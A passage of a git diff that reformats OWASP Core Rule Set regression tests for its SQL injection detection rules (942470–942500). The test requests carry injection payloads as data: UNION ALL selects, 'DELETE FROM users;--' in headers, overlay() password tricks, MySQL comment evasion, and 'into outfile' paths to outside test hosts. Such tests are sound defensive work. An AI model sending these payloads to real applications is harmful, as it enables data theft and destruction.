"/get/index.php?id=1%2bcurrent_user::int" - version: HTTP/1.0 - output: - log_contains: id "942470" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index af47b1574..cf93c29b3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -1,211 +1,209 @@ --- meta: author: "Jose Nazario, azurit" - description: None - enabled: true - name: 942480.yaml +rule_id: 942480 tests: - - test_title: 942480-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # variable name boundary attacks - uri: "/get?'msdasql'" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/get?'msdasql'" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 3 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 4 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS3\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 10 desc: "SQL injection in User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 11 desc: "SQL injection in arbitrary header" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - SomeHeader: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 12 desc: "SQL injection using 'overlay(...placing..) with newlines" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 0c5c8c42b..910071cd0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -1,381 +1,379 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942490.yaml +rule_id: 942490 tests: - - test_title: 942490-1 + - test_id: 1 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 2 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' ', 10" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 3 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 4 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 5 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 6 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\"2562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\"2562*23" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 7 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":[\"00" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 8 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 9 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 10 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 11 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>9e7" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 12 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":\"65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 13 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 14 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 15 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 16 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":60" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 17 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\">%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 18 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":35" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 19 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 20 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":\"[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 21 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='16/17" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 22 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\";}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\";}7b6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 8c92f874c..54e148077 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -2,86 +2,85 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: "Detection of MySQL injection evasion attempts using special comments" - enabled: true - name: 942500.yaml +rule_id: 942500 tests: - - test_title: 942500-1 + - test_id: 1 desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" 